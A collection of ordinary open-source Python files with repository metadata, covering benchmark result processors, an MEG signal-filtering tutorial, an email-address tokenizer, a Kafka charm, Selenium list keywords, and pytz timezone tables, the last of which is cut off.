outfile = os.path.join(context.run_output_directory, 'results.csv')
with open(outfile, 'wb') as wfh:
writer = csv.writer(wfh)
writer.writerow(['id', 'workload', 'iteration', 'metric', ] +
extra_columns + ['value', 'units'])
for ir in results:
for metric in ir.metrics:
row = ([ir.id, ir.spec.label, ir.iteration, metric.name] +
[str(metric.classifiers.get(c, '')) for c in extra_columns] +
[str(metric.value), metric.units or ''])
writer.writerow(row)
class JsonReportProcessor(ResultProcessor):
"""
Creates a ``results.json`` in the output directory containing results for
all iterations in JSON format.
"""
name = 'json'
def process_run_result(self, result, context):
outfile = os.path.join(context.run_output_directory, 'results.json')
with open(outfile, 'wb') as wfh:
output = []
for result in result.iteration_results:
output.append({
'id': result.id,
'workload': result.workload.name,
'iteration': result.iteration,
'metrics': [dict([(k, v) for k, v in m.__dict__.iteritems()
if not k.startswith('_')])
for m in result.metrics],
})
json.dump(output, wfh, indent=4)
context.add_artifact('run_result_json', 'results.json', 'export')
class SummaryCsvProcessor(ResultProcessor):
"""
Similar to csv result processor, but only contains workloads' summary metrics.
"""
name = 'summary_csv'
def process_run_result(self, result, context):
outfile = os.path.join(context.run_output_directory, 'summary.csv')
with open(outfile, 'wb') as wfh:
writer = csv.writer(wfh)
writer.writerow(['id', 'workload', 'iteration', 'metric', 'value', 'units'])
for result in result.iteration_results:
for metric in result.metrics:
if metric.name in result.workload.summary_metrics:
row = [result.id, result.workload.name, result.iteration,
metric.name, str(metric.value), metric.units or '']
writer.writerow(row)
context.add_artifact('run_result_summary', 'summary.csv', 'export')
| bjackman/workload-automation | wlauto/result_processors/standard.py | Python | apache-2.0 | 6,207 |
"""
Filtering and resampling data
=============================
Some artifacts are restricted to certain frequencies and can therefore
be fixed by filtering. An artifact that typically affects only some
frequencies is due to the power line.
Power-line noise is noise created by the electrical network.
It is composed of sharp peaks at 50Hz (or 60Hz depending on your
geographical location). Some peaks may also be present at the harmonic
frequencies, i.e. the integer multiples of
the power-line frequency, e.g. 100Hz, 150Hz, ... (or 120Hz, 180Hz, ...).
This tutorial covers some basics of how to filter data in MNE-Python.
For more in-depth information about filter design in general and in
MNE-Python in particular, check out
:ref:`sphx_glr_auto_tutorials_plot_background_filtering.py`.
"""
import numpy as np
import mne
from mne.datasets import sample
data_path = sample.data_path()
raw_fname = data_path + '/MEG/sample/sample_audvis_raw.fif'
proj_fname = data_path + '/MEG/sample/sample_audvis_eog_proj.fif'
tmin, tmax = 0, 20 # use the first 20s of data
# Setup for reading the raw data (save memory by cropping the raw data
# before loading it)
raw = mne.io.read_raw_fif(raw_fname)
raw.crop(tmin, tmax).load_data()
raw.info['bads'] = ['MEG 2443', 'EEG 053'] # bads + 2 more
fmin, fmax = 2, 300 # look at frequencies between 2 and 300Hz
n_fft = 2048 # the FFT size (n_fft). Ideally a power of 2
# Pick a subset of channels (here for speed reasons)
selection = mne.read_selection('Left-temporal')
picks = mne.pick_types(raw.info, meg='mag', eeg=False, eog=False,
stim=False, exclude='bads', selection=selection)
# Let's first check out all channel types
raw.plot_psd(area_mode='range', tmax=10.0, picks=picks, average=False)
###############################################################################
# Removing power-line noise with notch filtering
# ----------------------------------------------
#
# Removing power-line noise can be done with a Notch filter, directly on the
# Raw object, specifying an array of frequency to be cut off:
raw.notch_filter(np.arange(60, 241, 60), picks=picks, filter_length='auto',
phase='zero')
raw.plot_psd(area_mode='range', tmax=10.0, picks=picks, average=False)
###############################################################################
# Removing power-line noise with low-pass filtering
# -------------------------------------------------
#
# If you're only interested in low frequencies, below the peaks of power-line
# noise you can simply low pass filter the data.
# low pass filtering below 50 Hz
raw.filter(None, 50., fir_design='firwin')
raw.plot_psd(area_mode='range', tmax=10.0, picks=picks, average=False)
###############################################################################
# High-pass filtering to remove slow drifts
# -----------------------------------------
#
# To remove slow drifts, you can high pass.
#
# .. warning:: In several applications such as event-related potential (ERP)
# and event-related field (ERF) analysis, high-pass filters with
# cutoff frequencies greater than 0.1 Hz are usually considered
# problematic since they significantly change the shape of the
# resulting averaged waveform (see examples in
# :ref:`tut_filtering_hp_problems`). In such applications, apply
# high-pass filters with caution.
raw.filter(1., None, fir_design='firwin')
raw.plot_psd(area_mode='range', tmax=10.0, picks=picks, average=False)
###############################################################################
# To do the low-pass and high-pass filtering in one step you can do
# a so-called *band-pass* filter by running the following:
# band-pass filtering in the range 1 Hz - 50 Hz
raw.filter(1, 50., fir_design='firwin')
###############################################################################
# Downsampling and decimation
# ---------------------------
#
# When performing experiments where timing is critical, a signal with a high
# sampling rate is desired. However, having a signal with a much higher
# sampling rate than necessary needlessly consumes memory and slows down
# computations operating on the data. To avoid that, you can downsample
# your time series. Since downsampling raw data reduces the timing precision
# of events, it is recommended only for use in procedures that do not require
# optimal precision, e.g. computing EOG or ECG projectors on long recordings.
#
# .. note:: A *downsampling* operation performs a low-pass (to prevent
# aliasing) followed by *decimation*, which selects every
# :math:`N^{th}` sample from the signal. See
# :func:`scipy.signal.resample` and
# :func:`scipy.signal.resample_poly` for examples.
#
# Data resampling can be done with *resample* methods.
raw.resample(100, npad="auto") # set sampling frequency to 100Hz
raw.plot_psd(area_mode='range', tmax=10.0, picks=picks)
###############################################################################
# To avoid this reduction in precision, the suggested pipeline for
# processing final data to be analyzed is:
#
# 1. low-pass the data with :meth:`mne.io.Raw.filter`.
# 2. Extract epochs with :class:`mne.Epochs`.
# 3. Decimate the Epochs object using :meth:`mne.Epochs.decimate` or the
# ``decim`` argument to the :class:`mne.Epochs` object.
#
# We also provide the convenience methods :meth:`mne.Epochs.resample` and
# :meth:`mne.Evoked.resample` to downsample or upsample data, but these are
# less optimal because they will introduce edge artifacts into every epoch,
# whereas filtering the raw data will introduce edge artifacts only at
# the start and end of the recording.
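#
# A minimal sketch of steps 2-3 of that pipeline might look like the following
# (shown only as a comment; the event extraction assumes the sample dataset's
# default stim channel, and the ``decim`` factor is illustrative)::
#
#     events = mne.find_events(raw, stim_channel='STI 014')
#     epochs = mne.Epochs(raw, events, tmin=-0.2, tmax=0.5, decim=4)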
| teonlamont/mne-python | tutorials/plot_artifacts_correction_filtering.py | Python | bsd-3-clause | 5,783 |
from django import template
register = template.Library()
@register.simple_tag(takes_context=True)
def table_specific(context, table_id):
"""Safely include a fragment specific to the given table, but handle no special info gracefully."""
try:
fragment_path = "table/specific/%s.html" % table_id
t = template.loader.get_template(fragment_path)
return t.render(context)
except template.TemplateDoesNotExist:
return ""
| uscensusbureau/censusreporter | censusreporter/apps/census/templatetags/tabletags.py | Python | mit | 462 |
# Copyright 2016 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Regression using the DNNRegressor Estimator."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import tensorflow as tf
import imports85 # pylint: disable=g-bad-import-order
STEPS = 5000
def main(argv):
"""Builds, trains, and evaluates the model."""
assert len(argv) == 1
(x_train, y_train), (x_test, y_test) = imports85.load_data()
# Build the training input_fn.
input_train = tf.estimator.inputs.pandas_input_fn(
x=x_train, y=y_train, num_epochs=None, shuffle=True)
# Build the validation input_fn.
input_test = tf.estimator.inputs.pandas_input_fn(
x=x_test, y=y_test, shuffle=True)
# The first way assigns a unique weight to each category. To do this you must
# specify the category's vocabulary (values outside this specification will
# receive a weight of zero). Here we specify the vocabulary using a list of
# options. The vocabulary can also be specified with a vocabulary file (using
# `categorical_column_with_vocabulary_file`). For features covering a
# range of positive integers use `categorical_column_with_identity`.
body_style_vocab = ["hardtop", "wagon", "sedan", "hatchback", "convertible"]
body_style = tf.feature_column.categorical_column_with_vocabulary_list(
key="body-style", vocabulary_list=body_style_vocab)
make = tf.feature_column.categorical_column_with_hash_bucket(
key="make", hash_bucket_size=50)
feature_columns = [
tf.feature_column.numeric_column(key="curb-weight"),
tf.feature_column.numeric_column(key="highway-mpg"),
# Since this is a DNN model, convert categorical columns from sparse
# to dense.
# Wrap them in an `indicator_column` to create a
# one-hot vector from the input.
tf.feature_column.indicator_column(body_style),
# Or use an `embedding_column` to create a trainable vector for each
# index.
tf.feature_column.embedding_column(make, dimension=3),
]
# Build a DNNRegressor, with 2x20-unit hidden layers, with the feature columns
# defined above as input.
model = tf.estimator.DNNRegressor(
hidden_units=[20, 20], feature_columns=feature_columns)
# Train the model.
model.train(input_fn=input_train, steps=STEPS)
# Evaluate how the model performs on data it has not yet seen.
eval_result = model.evaluate(input_fn=input_test)
# The evaluation returns a Python dictionary. The "average_loss" key holds the
# Mean Squared Error (MSE).
average_loss = eval_result["average_loss"]
# Convert MSE to Root Mean Square Error (RMSE).
print("\n" + 80 * "*")
print("\nRMS error for the test set: ${:.0f}".format(average_loss**0.5))
print()
if __name__ == "__main__":
# The Estimator periodically generates "INFO" logs; make these logs visible.
tf.logging.set_verbosity(tf.logging.INFO)
tf.app.run(main=main)
| xuleiboy1234/autoTitle | tensorflow/tensorflow/examples/get_started/regression/dnn_regression.py | Python | mit | 3,579 |
# coding:utf-8
"""
TokenStream represents a stream of tokens that a parser will consume.
TokenStream can be used to consume tokens, peek ahead, and synchronize to a
delimiter token. The tokens that the token stream operates on are either
compiled regular expressions or strings.
"""
import re
LBRACKET = '<'
AT_SYMBOL = '@'
RBRACKET = '>'
DQUOTE = '"'
BAD_DOMAIN = re.compile(r''' # start or end
^-|-$ # with -
''', re.MULTILINE | re.VERBOSE)
DELIMITER = re.compile(r'''
[,;][,;\s]* # delimiter
''', re.MULTILINE | re.VERBOSE)
WHITESPACE = re.compile(r'''
(\ |\t)+ # whitespace
''', re.MULTILINE | re.VERBOSE)
UNI_WHITE = re.compile(ur'''
[
\u0020\u00a0\u1680\u180e
\u2000-\u200a
\u2028\u202f\u205f\u3000
]*
''', re.MULTILINE | re.VERBOSE | re.UNICODE)
RELAX_ATOM = re.compile(r'''
([^\s<>;,"]+)
''', re.MULTILINE | re.VERBOSE)
ATOM = re.compile(r'''
[A-Za-z0-9!#$%&'*+\-/=?^_`{|}~]+ # atext
''', re.MULTILINE | re.VERBOSE)
DOT_ATOM = re.compile(r'''
[A-Za-z0-9!#$%&'*+\-/=?^_`{|}~]+ # atext
(\.[A-Za-z0-9!#$%&'*+\-/=?^_`{|}~]+)* # (dot atext)*
''', re.MULTILINE | re.VERBOSE)
UNI_ATOM = re.compile(ur'''
([^\s<>;,"]+)
''', re.MULTILINE | re.VERBOSE | re.UNICODE)
UNI_QSTR = re.compile(ur'''
"
(?P<qstr>([^"]+))
"
''', re.MULTILINE | re.VERBOSE | re.UNICODE)
QSTRING = re.compile(r'''
" # dquote
(\s* # whitespace
([\x21\x23-\x5b\x5d-\x7e] # qtext
| # or
\\[\x21-\x7e\t\ ]))* # quoted-pair
\s* # whitespace
" # dquote
''', re.MULTILINE | re.VERBOSE)
URL = re.compile(r'''
(?:http|https)://
[^\s<>{}|\^~\[\]`;,]+
''', re.MULTILINE | re.VERBOSE | re.UNICODE)
class TokenStream(object):
"""
Represents the stream of tokens that the parser will consume. The token
stream can be used to consume tokens, peek ahead, and synchonize to a
delimiter token.
    When the stream reaches its end, the position is placed
at one plus the position of the last token.
"""
def __init__(self, stream):
self.position = 0
self.stream = stream
def get_token(self, token, ngroup=None):
"""
Get the next token from the stream and advance the stream. Token can
be either a compiled regex or a string.
"""
# match single character
if isinstance(token, basestring) and len(token) == 1:
if self.peek() == token:
self.position += 1
return token
return None
# match a pattern
match = token.match(self.stream, self.position)
if match:
advance = match.end() - match.start()
self.position += advance
            # if we are asking for a named capture, return just that
if ngroup:
return match.group(ngroup)
# otherwise return the entire capture
return match.group()
return None
def end_of_stream(self):
"""
Check if the end of the stream has been reached, if it has, returns
True, otherwise false.
"""
if self.position >= len(self.stream):
return True
return False
def synchronize(self):
"""
        Advances the stream to synchronize to the delimiter token. Used primarily
in relaxed mode parsing.
"""
start_pos = self.position
end_pos = len(self.stream)
match = DELIMITER.search(self.stream, self.position)
if match:
self.position = match.start()
end_pos = match.start()
else:
self.position = end_pos
skip = self.stream[start_pos:end_pos]
if skip.strip() == '':
return None
return skip
def peek(self, token=None):
"""
Peek at the stream to see what the next token is or peek for a
specific token.
"""
        # peek at what's next in the stream
if token is None:
if self.position < len(self.stream):
return self.stream[self.position]
else:
return None
# peek for a specific token
else:
match = token.match(self.stream, self.position)
if match:
return self.stream[match.start():match.end()]
return None
| glyph/flanker | flanker/addresslib/tokenizer.py | Python | apache-2.0 | 5,495 |
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
from charmhelpers.core import hookenv
from charmhelpers.core import host
from jujubigdata import utils
from charms.layer.apache_bigtop_base import Bigtop
from charms import layer
from subprocess import check_output
class Kafka(object):
"""
This class manages Kafka.
"""
def __init__(self):
self.dist_config = utils.DistConfig(
data=layer.options('apache-bigtop-base'))
def open_ports(self):
for port in self.dist_config.exposed_ports('kafka'):
hookenv.open_port(port)
def close_ports(self):
for port in self.dist_config.exposed_ports('kafka'):
hookenv.close_port(port)
def configure_kafka(self, zk_units, network_interface=None):
# Get ip:port data from our connected zookeepers
zks = []
for unit in zk_units:
ip = utils.resolve_private_address(unit['host'])
zks.append("%s:%s" % (ip, unit['port']))
zks.sort()
zk_connect = ",".join(zks)
service, unit_num = os.environ['JUJU_UNIT_NAME'].split('/', 1)
kafka_port = self.dist_config.port('kafka')
roles = ['kafka-server']
override = {
'kafka::server::broker_id': unit_num,
'kafka::server::port': kafka_port,
'kafka::server::zookeeper_connection_string': zk_connect,
}
if network_interface:
ip = Bigtop().get_ip_for_interface(network_interface)
override['kafka::server::bind_addr'] = ip
bigtop = Bigtop()
bigtop.render_site_yaml(roles=roles, overrides=override)
bigtop.trigger_puppet()
self.set_advertise()
self.restart()
def restart(self):
self.stop()
self.start()
def start(self):
host.service_start('kafka-server')
def stop(self):
host.service_stop('kafka-server')
def set_advertise(self):
short_host = check_output(['hostname', '-s']).decode('utf8').strip()
# Configure server.properties
# NB: We set the advertised.host.name below to our short hostname
# to kafka (admin will still have to expose kafka and ensure the
# external client can resolve the short hostname to our public ip).
kafka_server_conf = '/etc/kafka/conf/server.properties'
utils.re_edit_in_place(kafka_server_conf, {
r'^#?advertised.host.name=.*': 'advertised.host.name=%s' % short_host,
})
| welikecloud/bigtop | bigtop-packages/src/charm/kafka/layer-kafka/lib/charms/layer/bigtop_kafka.py | Python | apache-2.0 | 3,240 |
# vim: tabstop=4 shiftwidth=4 softtabstop=4
# Copyright (c) 2011 OpenStack, LLC.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
from nova.rootwrap import filters
filterlist = [
# nova/volume/iscsi.py: iscsi_helper '--op' ...
filters.CommandFilter("/usr/sbin/ietadm", "root"),
filters.CommandFilter("/usr/sbin/tgtadm", "root"),
# nova/volume/driver.py: 'vgs', '--noheadings', '-o', 'name'
filters.CommandFilter("/sbin/vgs", "root"),
# nova/volume/driver.py: 'lvcreate', '-L', sizestr, '-n', volume_name,..
# nova/volume/driver.py: 'lvcreate', '-L', ...
filters.CommandFilter("/sbin/lvcreate", "root"),
# nova/volume/driver.py: 'dd', 'if=%s' % srcstr, 'of=%s' % deststr,...
filters.CommandFilter("/bin/dd", "root"),
# nova/volume/driver.py: 'lvremove', '-f', "%s/%s" % ...
filters.CommandFilter("/sbin/lvremove", "root"),
# nova/volume/driver.py: 'lvdisplay', '--noheading', '-C', '-o', 'Attr',..
filters.CommandFilter("/sbin/lvdisplay", "root"),
# nova/volume/driver.py: 'iscsiadm', '-m', 'discovery', '-t',...
# nova/volume/driver.py: 'iscsiadm', '-m', 'node', '-T', ...
filters.CommandFilter("/sbin/iscsiadm", "root"),
]
| gyang/nova | nova/rootwrap/volume.py | Python | apache-2.0 | 1,754 |
# Copyright 2016 gRPC authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
_BEFORE_IMPORT = tuple(globals())
from grpc import * # pylint: disable=wildcard-import
_AFTER_IMPORT = tuple(globals())
GRPC_ELEMENTS = tuple(
element for element in _AFTER_IMPORT
if element not in _BEFORE_IMPORT and element != '_BEFORE_IMPORT')
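# A sketch of how a test might consume this module (hypothetical test body,
# shown only as a comment):
#
#   import grpc
#   from tests.unit import _from_grpc_import_star
#   assert set(grpc.__all__) <= set(_from_grpc_import_star.GRPC_ELEMENTS)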
| chrisdunelm/grpc | src/python/grpcio_tests/tests/unit/_from_grpc_import_star.py | Python | apache-2.0 | 836 |
# Copyright 2008-2011 Nokia Siemens Networks Oyj
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from runonfailure import RunOnFailure
class Select(RunOnFailure):
def get_list_items(self, locator):
"""Returns the values in the list identified by `locator`.
List keywords work on both lists and combo boxes. Key attributes for
lists are `id` and `name`. See `introduction` for details about
locating elements.
"""
return self._selenium.get_select_options(locator)
def get_selected_list_value(self, locator):
"""Returns the value of the selected element from the list identified by `locator`.
Return value is read from `value` attribute of the selected element.
Fails if there are zero or more than one selection.
List keywords work on both lists and combo boxes. Key attributes for
lists are `id` and `name`. See `introduction` for details about
locating elements.
This keyword was added in SeleniumLibrary 2.8.
"""
return self._selenium.get_selected_value(locator)
def get_selected_list_values(self, locator):
"""Returns the values of selected elements (as a list) from the list identified by `locator`.
Fails if there is no selection.
List keywords work on both lists and combo boxes. Key attributes for
lists are `id` and `name`. See `introduction` for details about
locating elements.
This keyword was added in SeleniumLibrary 2.8.
"""
return self._selenium.get_selected_values(locator)
def get_selected_list_label(self, locator):
"""Returns the visible label of the selected element from the list identified by `locator`.
Fails if there are zero or more than one selection.
List keywords work on both lists and combo boxes. Key attributes for
lists are `id` and `name`. See `introduction` for details about
locating elements.
This keyword was added in SeleniumLibrary 2.8.
"""
return self._selenium.get_selected_label(locator)
def get_selected_list_labels(self, locator):
"""Returns the visible labels of selected elements (as a list) from the list identified by `locator`.
Fails if there is no selection.
List keywords work on both lists and combo boxes. Key attributes for
lists are `id` and `name`. See `introduction` for details about
locating elements.
This keyword was added in SeleniumLibrary 2.8.
"""
return self._selenium.get_selected_labels(locator)
def list_selection_should_be(self, locator, *values):
"""Verifies the selection of list identified by `locator` is exactly `*values`.
If you want to test that no option is selected, simply give no `values`.
List keywords work on both lists and combo boxes. Key attributes for
lists are `id` and `name`. See `introduction` for details about
locating elements.
"""
opts = values and 'options [ %s ]' % ' | '.join(values) or 'no options'
self._info("Verifying list '%s' has %s selected." % (locator, opts))
self.page_should_contain_list(locator)
try:
selected_values = self._selenium.get_selected_values(locator)
selected_labels = self._selenium.get_selected_labels(locator)
except Exception, err:
if not values and self._error_contains(err, 'No option selected'):
return
raise
err = "List '%s' should have had selection [ %s ] but it was [ %s ]" \
% (locator, ' | '.join(values), ' | '.join(selected_labels))
for expvalue in values:
if expvalue not in selected_labels + selected_values:
raise AssertionError(err)
for label, value in zip(selected_labels, selected_values):
if label not in values and value not in values:
raise AssertionError(err)
def select_from_list(self, locator, *values):
"""Selects `*values` from list identified by `locator`
If more than one value is given for a single-selection list, the last
value will be selected. If the target list is a multi-selection list,
and `*values` is an empty list, all values of the list will be selected.
List keywords work on both lists and combo boxes. Key attributes for
lists are `id` and `name`. See `introduction` for details about
locating elements.
This keyword does not support waiting for possible page load
automatically. If that is needed, keyword `Wait Until Page Loaded`
can be used after this keyword.
"""
selection = values and "values '%s'" % ', '.join(values) or 'all values'
self._info("Selecting %s from list '%s'." % (selection, locator))
values = list(values)
if len(values) == 0:
values = self._selenium.get_select_options(locator)
if self._is_multiselect_list(locator):
self._select_from_multiselect_list(locator, values)
else:
self._select_from_singleselect_list(locator, values)
def _select_from_multiselect_list(self, locator, selection):
self._call_method_for_list_elements('add_selection', locator, selection)
def _select_from_singleselect_list(self, locator, selection):
self._call_method_for_list_elements('select', locator, selection)
def _is_multiselect_list(self, locator):
try:
self._selenium.get_attribute(locator+'@multiple')
return True
except Exception, err:
if self._error_contains(err, 'attribute: %s@multiple' % locator):
return False
raise
def _call_method_for_list_elements(self, method_name, locator, elements):
method = getattr(self._selenium, method_name)
for elem in elements:
try:
method(locator, elem)
except:
method(locator, 'value=%s' % elem)
def unselect_from_list(self, locator, *values):
"""Unselects given values from list identified by locator.
        As a special case, giving an empty list as `*values` will remove all
selections.
List keywords work on both lists and combo boxes. Key attributes for
lists are `id` and `name`. See `introduction` for details about
locating elements.
This keyword does not support waiting for possible page load
automatically. If that is needed, keyword `Wait Until Page Loaded`
can be used after this keyword.
"""
selection = values and "values '%s'" % ', '.join(values) or 'all values'
self._info("Unselecting %s from list '%s'." % (selection, locator))
if not self._is_multiselect_list(locator):
raise RuntimeError("Keyword 'Unselect from list' works only for "
"multiselect lists")
if not values:
self._selenium.remove_all_selections(locator)
else:
self._call_method_for_list_elements('remove_selection', locator,
list(values))
def select_all_from_list(self, locator, wait=''):
"""Selects all values from multi-select list identified by `id`.
Key attributes for lists are `id` and `name`. See `introduction` for
details about locating elements and about `wait` argument.
"""
self._info("Selecting all values from list '%s'." % locator)
selected_items = []
if self._selenium.is_something_selected(locator):
selected_items = self._selenium.get_selected_labels(locator)
for item in self._selenium.get_select_options(locator):
if item not in selected_items:
self._add_to_selection(locator, item)
if wait:
self.wait_until_page_loaded()
def _add_to_selection(self, locator, item):
try:
self._selenium.add_selection(locator, item)
except Exception, err:
if self._error_contains(err, "Not a multi-select"):
raise RuntimeError("Keyword 'Select all from list' works only "
"for multiselect lists.")
raise
def list_should_have_no_selections(self, locator):
"""Verifies list identified by `locator` has no selections.
List keywords work on both lists and combo boxes. Key attributes for
lists are `id` and `name`. See `introduction` for details about
locating elements.
"""
self._info("Verifying list '%s' has no selection." % locator)
if self._selenium.is_something_selected(locator):
selection = ' | '.join(self._selenium.get_selected_labels(locator))
raise AssertionError("List '%s' should have had no selection "
"(selection was [ %s ])" % (locator, selection))
| ktan2020/legacy-automation | win/Lib/site-packages/SeleniumLibrary/select.py | Python | mit | 9,556 |
"""
Support for EnOcean sensors.
For more details about this platform, please refer to the documentation at
https://home-assistant.io/components/sensor.enocean/
"""
import logging
import voluptuous as vol
from homeassistant.components.sensor import PLATFORM_SCHEMA
from homeassistant.const import (CONF_NAME, CONF_ID)
from homeassistant.helpers.entity import Entity
import homeassistant.helpers.config_validation as cv
from homeassistant.components import enocean
_LOGGER = logging.getLogger(__name__)
DEFAULT_NAME = 'EnOcean sensor'
DEPENDENCIES = ['enocean']
PLATFORM_SCHEMA = PLATFORM_SCHEMA.extend({
vol.Required(CONF_ID): cv.string,
vol.Optional(CONF_NAME, default=DEFAULT_NAME): cv.string,
})
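# A hypothetical configuration.yaml entry for this platform (the id and name
# values are illustrative only):
#
#   sensor:
#     - platform: enocean
#       id: "01:87:C4:3A"
#       name: Office plug power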
def setup_platform(hass, config, add_devices, discovery_info=None):
"""Setup an EnOcean sensor device."""
dev_id = config.get(CONF_ID)
devname = config.get(CONF_NAME)
add_devices([EnOceanSensor(dev_id, devname)])
class EnOceanSensor(enocean.EnOceanDevice, Entity):
"""Representation of an EnOcean sensor device such as a power meter."""
def __init__(self, dev_id, devname):
"""Initialize the EnOcean sensor device."""
enocean.EnOceanDevice.__init__(self)
self.stype = "powersensor"
self.power = None
self.dev_id = dev_id
self.which = -1
self.onoff = -1
self.devname = devname
@property
def name(self):
"""Return the name of the device."""
return 'Power %s' % self.devname
def value_changed(self, value):
"""Update the internal state of the device."""
self.power = value
self.update_ha_state()
@property
def state(self):
"""Return the state of the device."""
return self.power
@property
def unit_of_measurement(self):
"""Return the unit of measurement."""
return "W"
| Smart-Torvy/torvy-home-assistant | homeassistant/components/sensor/enocean.py | Python | mit | 1,877 |
'''tzinfo timezone information for Asia/Manila.'''
from pytz.tzinfo import DstTzInfo
from pytz.tzinfo import memorized_datetime as d
from pytz.tzinfo import memorized_ttinfo as i
class Manila(DstTzInfo):
'''Asia/Manila timezone definition. See datetime.tzinfo for details'''
zone = 'Asia/Manila'
_utc_transition_times = [
d(1,1,1,0,0,0),
d(1936,10,31,16,0,0),
d(1937,1,31,15,0,0),
d(1942,4,30,16,0,0),
d(1944,10,31,15,0,0),
d(1954,4,11,16,0,0),
d(1954,6,30,15,0,0),
d(1978,3,21,16,0,0),
d(1978,9,20,15,0,0),
]
_transition_info = [
i(28800,0,'PHT'),
i(32400,3600,'PHST'),
i(28800,0,'PHT'),
i(32400,0,'JST'),
i(28800,0,'PHT'),
i(32400,3600,'PHST'),
i(28800,0,'PHT'),
i(32400,3600,'PHST'),
i(28800,0,'PHT'),
]
Manila = Manila()
| newvem/pytz | pytz/zoneinfo/Asia/Manila.py | Python | mit | 763 |
'''tzinfo timezone information for America/Kentucky/Monticello.'''
from pytz.tzinfo import DstTzInfo
from pytz.tzinfo import memorized_datetime as d
from pytz.tzinfo import memorized_ttinfo as i
class Monticello(DstTzInfo):
'''America/Kentucky/Monticello timezone definition. See datetime.tzinfo for details'''
zone = 'America/Kentucky/Monticello'
_utc_transition_times = [
d(1,1,1,0,0,0),
d(1918,3,31,8,0,0),
d(1918,10,27,7,0,0),
d(1919,3,30,8,0,0),
d(1919,10,26,7,0,0),
d(1942,2,9,8,0,0),
d(1945,8,14,23,0,0),
d(1945,9,30,7,0,0),
d(1968,4,28,8,0,0),
d(1968,10,27,7,0,0),
d(1969,4,27,8,0,0),
d(1969,10,26,7,0,0),
d(1970,4,26,8,0,0),
d(1970,10,25,7,0,0),
d(1971,4,25,8,0,0),
d(1971,10,31,7,0,0),
d(1972,4,30,8,0,0),
d(1972,10,29,7,0,0),
d(1973,4,29,8,0,0),
d(1973,10,28,7,0,0),
d(1974,1,6,8,0,0),
d(1974,10,27,7,0,0),
d(1975,2,23,8,0,0),
d(1975,10,26,7,0,0),
d(1976,4,25,8,0,0),
d(1976,10,31,7,0,0),
d(1977,4,24,8,0,0),
d(1977,10,30,7,0,0),
d(1978,4,30,8,0,0),
d(1978,10,29,7,0,0),
d(1979,4,29,8,0,0),
d(1979,10,28,7,0,0),
d(1980,4,27,8,0,0),
d(1980,10,26,7,0,0),
d(1981,4,26,8,0,0),
d(1981,10,25,7,0,0),
d(1982,4,25,8,0,0),
d(1982,10,31,7,0,0),
d(1983,4,24,8,0,0),
d(1983,10,30,7,0,0),
d(1984,4,29,8,0,0),
d(1984,10,28,7,0,0),
d(1985,4,28,8,0,0),
d(1985,10,27,7,0,0),
d(1986,4,27,8,0,0),
d(1986,10,26,7,0,0),
d(1987,4,5,8,0,0),
d(1987,10,25,7,0,0),
d(1988,4,3,8,0,0),
d(1988,10,30,7,0,0),
d(1989,4,2,8,0,0),
d(1989,10,29,7,0,0),
d(1990,4,1,8,0,0),
d(1990,10,28,7,0,0),
d(1991,4,7,8,0,0),
d(1991,10,27,7,0,0),
d(1992,4,5,8,0,0),
d(1992,10,25,7,0,0),
d(1993,4,4,8,0,0),
d(1993,10,31,7,0,0),
d(1994,4,3,8,0,0),
d(1994,10,30,7,0,0),
d(1995,4,2,8,0,0),
d(1995,10,29,7,0,0),
d(1996,4,7,8,0,0),
d(1996,10,27,7,0,0),
d(1997,4,6,8,0,0),
d(1997,10,26,7,0,0),
d(1998,4,5,8,0,0),
d(1998,10,25,7,0,0),
d(1999,4,4,8,0,0),
d(1999,10,31,7,0,0),
d(2000,4,2,8,0,0),
d(2000,10,29,7,0,0),
d(2001,4,1,7,0,0),
d(2001,10,28,6,0,0),
d(2002,4,7,7,0,0),
d(2002,10,27,6,0,0),
d(2003,4,6,7,0,0),
d(2003,10,26,6,0,0),
d(2004,4,4,7,0,0),
d(2004,10,31,6,0,0),
d(2005,4,3,7,0,0),
d(2005,10,30,6,0,0),
d(2006,4,2,7,0,0),
d(2006,10,29,6,0,0),
d(2007,3,11,7,0,0),
d(2007,11,4,6,0,0),
d(2008,3,9,7,0,0),
d(2008,11,2,6,0,0),
d(2009,3,8,7,0,0),
d(2009,11,1,6,0,0),
d(2010,3,14,7,0,0),
d(2010,11,7,6,0,0),
d(2011,3,13,7,0,0),
d(2011,11,6,6,0,0),
d(2012,3,11,7,0,0),
d(2012,11,4,6,0,0),
d(2013,3,10,7,0,0),
